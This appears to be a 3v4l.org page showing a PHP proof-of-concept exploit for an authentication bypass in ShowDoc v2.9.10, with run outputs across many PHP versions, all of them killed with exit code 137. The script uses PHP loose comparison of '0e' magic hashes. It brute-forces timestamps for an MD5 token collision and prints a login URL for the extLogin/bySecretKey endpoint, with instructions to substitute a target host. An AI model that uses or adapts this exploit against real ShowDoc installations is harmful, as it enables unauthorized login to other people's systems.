3v4l.org

run code in 300+ PHP versions simultaneously
<?php
// Credit: Qianxin, Network Security Department, Product-Safety Team ( Unc1e )
// Date: 2021/10/13
/*
ShowDoc v2.9.10 Auth Bypass PoC #2:
1) PHP Type Juggling (weak typing), see https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf
2) Using that: ('0e111' == '0e222') => (bool)true
3) This script uses brute-forcing to find a possible collision
*/
$username = 's'; // Forged username
$time = 1694131871; // 2023-09-08 08:11:11, always valid timestamp
$login_secret_key = '35d0b093f240cf6abedbe85fb174d317'; // a possible bin2hex( random_bytes( 16 ) );
$total = 1000000;
for ($i = 0; $i < (1000 * $total); $i++) { // try to find a solution in 1 billion numbers!
    $time += 1;
    $token = md5($username.$login_secret_key.$time);
    if (substr($token, 0, 2) === "0e") {
        if (preg_match('/^[0]+e[0-9]+$/', $token)) // 0e123, 00e123, ...
        {
            echo "time:$time, while final is: $token".PHP_EOL;
        }
    }
    if (($i % $total) == 0) {
        echo "[".($i / $total)."‰]".PHP_EOL;
    }
}
echo "http://[showdoc]/server/?s=/api/extLogin/bySecretKey&username={$username}&time={$time}&token={$token}&redirect=".PHP_EOL; // Please replace the [showdoc] to your target
?>
Output for 7.3.23, 7.4.26, 8.1.1, 8.1.28, 8.2.16 - 8.2.18, 8.3.3 - 8.3.4, 8.3.6
[0‰] [1‰] [2‰] [3‰] [4‰] [5‰]
Process exited with code 137.
Output for 8.3.5
Warning: PHP Startup: Unable to load dynamic library 'sodium.so' (tried: /usr/lib/php/8.3.5/modules/sodium.so (libsodium.so.23: cannot open shared object file: No such file or directory), /usr/lib/php/8.3.5/modules/sodium.so.so (/usr/lib/php/8.3.5/modules/sodium.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0 [0‰] [1‰] [2‰] [3‰] [4‰] [5‰]
Process exited with code 137.
Output for 8.1.26, 8.2.14, 8.3.0 - 8.3.2
[0‰] [1‰] [2‰] [3‰] [4‰] [5‰] [6‰] [7‰] [8‰] [9‰]
Process exited with code 137.
Output for 8.1.25, 8.1.27, 8.2.13, 8.2.15
[0‰] [1‰] [2‰] [3‰] [4‰] [5‰] [6‰] [7‰] [8‰] [9‰] [10‰]
Process exited with code 137.
Output for 8.2.12
[0‰] [1‰] [2‰] [3‰] [4‰] [5‰] [6‰] [7‰] [8‰]
Process exited with code 137.
Output for 8.0.30, 8.1.23, 8.2.11
[0‰] [1‰] [2‰] [3‰] [4‰] [5‰] [6‰] [7‰]
Process exited with code 137.
Output for 7.3.0 - 7.3.22, 7.3.24 - 7.3.33, 7.4.0 - 7.4.25, 7.4.27 - 7.4.33, 8.0.0 - 8.0.29, 8.1.0, 8.1.2 - 8.1.22, 8.1.24, 8.2.0 - 8.2.10
[0‰] [1‰] [2‰] [3‰] [4‰] [5‰] [6‰]
Process exited with code 137.
